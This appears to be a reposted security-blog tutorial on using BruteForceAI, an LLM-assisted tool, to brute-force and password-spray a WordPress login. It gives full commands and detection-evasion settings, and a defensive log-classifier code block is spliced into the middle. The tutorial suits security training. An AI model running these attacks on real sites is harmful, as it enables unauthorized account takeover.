National Cyber Warfare Foundation (NCWF)

Automated Password Cracking with BruteForceAI


2025-09-15 14:36:07
milo
Red Team (CNA)



The post Automated Password Cracking with BruteForceAI first appeared on Hackers Arise.



Nowadays, security engineers make an effort to get people to use complex passwords, and 2FA is becoming required on more and more platforms. This makes password cracking more time-consuming and sometimes only a first step toward access, but it can still be the hacker’s best entry point to an account or network.





Today, I’d like to talk about BruteForceAI, a tool that simplifies password cracking by combining features of automated credential-attack tools with Large Language Models (LLMs).





BruteForceAI is a tool that automatically identifies login form selectors using AI and then conducts a brute force or password spraying attack in a human-like way.





Step #1: Install BruteForceAI





To get started, we need to clone the repository from GitHub:
kali> git clone https://github.com/MorDavid/BruteForceAI.git
kali> cd BruteForceAI









BruteForceAI requires Python 3.8 or higher. Consider checking the version before continuing:
kali> python --version









In my case, it’s 3.13.5, and now I’m ready to install dependencies:
kali> pip3 install -r requirements.txt









I’ve used the --break-system-packages flag to ignore the environment error. You can use this command or create a virtual Python environment for this project.





Besides that, I got an error about the sqlite3 version. To fix that, we can install the SQLite dev headers:
kali> sudo apt install libsqlite3-dev









For working with browser automation, BruteForceAI uses the Playwright library. We can install it using NPM:





kali> npm install playwright





To work correctly, Playwright needs a rendering engine; in this case, I’ll use Chromium:





kali> npx playwright install chromium





In the command above, you can see npx. It’s a command-line tool that comes with npm. It temporarily downloads and runs a program directly without adding it permanently to your system.









Step #2: AI Engine Setup





You have two options for the AI analysis engine: local or cloud AI. I have pretty humble hardware for running even small LLMs locally; therefore, I’ll show you how to use the cloud AI option.





There is a platform called Groq that provides access to different LLM models in the cloud through its API. To get started, you just need to sign up and acquire an API key.









Step #3: Prepare Target Lists





First of all, we need to create a file targets.txt and list URLs that contain a login form. In my case, it’ll be a WordPress website.









Before starting to crack, we need to figure out the registered users. For this, I’ve used WPScan and successfully saved all users to the file users.txt. To learn more about WPScan, check this article.









Step #4: Reconnaissance





Before launching attacks, BruteForceAI needs to analyze your targets and understand their login mechanisms.





kali> python3 BruteForceAI.py analyze --urls targets.txt --llm-provider groq --llm-model llama-3.3-70b-versatile --llm-api-key YOUR_KEY









The AI will analyze the target, identify form elements, and store the intelligence in a SQLite database.





Step #5: Online Password Cracking





We’re ready to execute a standard brute-force attack using AI-discovered selectors.





An important aspect that I didn’t mention is the password list. In this case, I’ll be using the 500 worst passwords from Seclists.





kali> python BruteForceAI.py attack --urls targets.txt --usernames users.txt --passwords /usr/share/seclists/Passwords/500-worst-passwords.txt --threads 10













I’ve used the --threads 10 flag, which means the script will run 10 parallel threads (simultaneous tasks) during the attack. But nowadays, such a brute-force attack will be quickly identified, so let’s see how we can conduct password spraying using BruteForceAI.





kali> python BruteForceAI.py attack --urls targets.txt --usernames users.txt --passwords /usr/share/seclists/Passwords/500-worst-passwords.txt --mode passwordspray --threads 15 --delay 10 --jitter 3 --success-exit





Where:





--mode passwordspray: Uses password spraying mode (tries one password across many accounts before moving to the next password).
--delay 10: Waits 10 seconds between attempts per thread.
--jitter 3: Adds up to 3 seconds of random extra delay to avoid detection.
--success-exit: Stops running immediately if a successful login is found.
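Seen from the defending side, the two modes above leave different traces in failed-login records: brute force piles failures onto one account, while spraying spreads a few failures over many accounts, so a per-account lockout counter barely moves. The following is an added example, not part of the original article or of BruteForceAI; the event format, IP addresses and thresholds are assumptions constructed for illustration.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

def make_sample():
    """Constructed failed-login events: 'ISO-time source-ip username' (hypothetical format)."""
    t0 = datetime(2025, 9, 15, 14, 0, 0)
    users = ["admin", "editor", "milo", "guest", "author", "backup"]
    line = lambda sec, ip, user: f"{(t0 + timedelta(seconds=sec)).isoformat()} {ip} {user}"
    # Spray-shaped source: two passes over six accounts, about 11 s apart.
    out = [line(11 * i, "203.0.113.7", users[i % 6]) for i in range(12)]
    # Brute-force-shaped source: 30 failures on one account, 1 s apart.
    out += [line(i, "198.51.100.9", "admin") for i in range(30)]
    # An ordinary user mistyping a password twice.
    out += [line(0, "192.0.2.44", "editor"), line(20, "192.0.2.44", "editor")]
    return out

def max_per_account(lines, ip):
    """Highest failure count a single account saw from this source (what a lockout counts)."""
    return max(Counter(l.split()[2] for l in lines if l.split()[1] == ip).values())

def classify(lines, window=timedelta(minutes=10), min_users=5, min_per_user=20):
    """Label each source IP by the shape of its failures inside a sliding time window."""
    by_ip = defaultdict(list)
    for entry in lines:
        ts, ip, user = entry.split()
        by_ip[ip].append((datetime.fromisoformat(ts), user))
    verdicts = {}
    for ip, events in by_ip.items():
        events.sort()
        verdict, start = "ok", 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1  # drop events that fell out of the window
            counts = Counter(user for _, user in events[start:end + 1])
            if len(counts) >= min_users:
                verdict = "spray"  # breadth: many accounts, few failures each
                break
            if max(counts.values()) >= min_per_user:
                verdict = "bruteforce"  # depth: one account hit repeatedly
        verdicts[ip] = verdict
    return verdicts

if __name__ == "__main__":
    sample = make_sample()
    for ip, verdict in classify(sample).items():
        print(ip, verdict, "max failures on one account:", max_per_account(sample, ip))
```

Because delays and jitter only stretch the timeline, the window has to be long enough to cover a full pass over the user list; the distinct-account count per source is the signal that survives slow pacing.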









BruteForceAI will continue from passwords that weren’t checked during the brute-force attack and start spraying.





To make it more stealthy, we can add a custom User-Agent, play with delays, and decrease the threads. And eventually this script will run until it checks all passwords or until it finds the correct one.





Summary





BruteForceAI is a great tool that makes password attacks much simpler. In this article, we covered how to install BruteForceAI, get it ready for use, conduct reconnaissance, and start attacking passwords. Combined with different LLMs, this tool can make password attacks faster and more efficient. But in any case, the success of this kind of attack depends on how good a password list you have, so consider checking tools like crunch and cupp.





If you want to improve your password-cracking skills and cybersecurity in general, check out our Master Hacker Bundle. You’ll dive deep into essential skills and techniques like reconnaissance, password cracking, vulnerability scanning, Metasploit 5, antivirus evasion, Python scripting, social engineering, and more.




Source: HackersArise
Source Link: https://hackers-arise.com/automated-password-cracking-with-bruteforceai/





Copyright 2012 through 2025 - National Cyber Warfare Foundation - All rights reserved worldwide.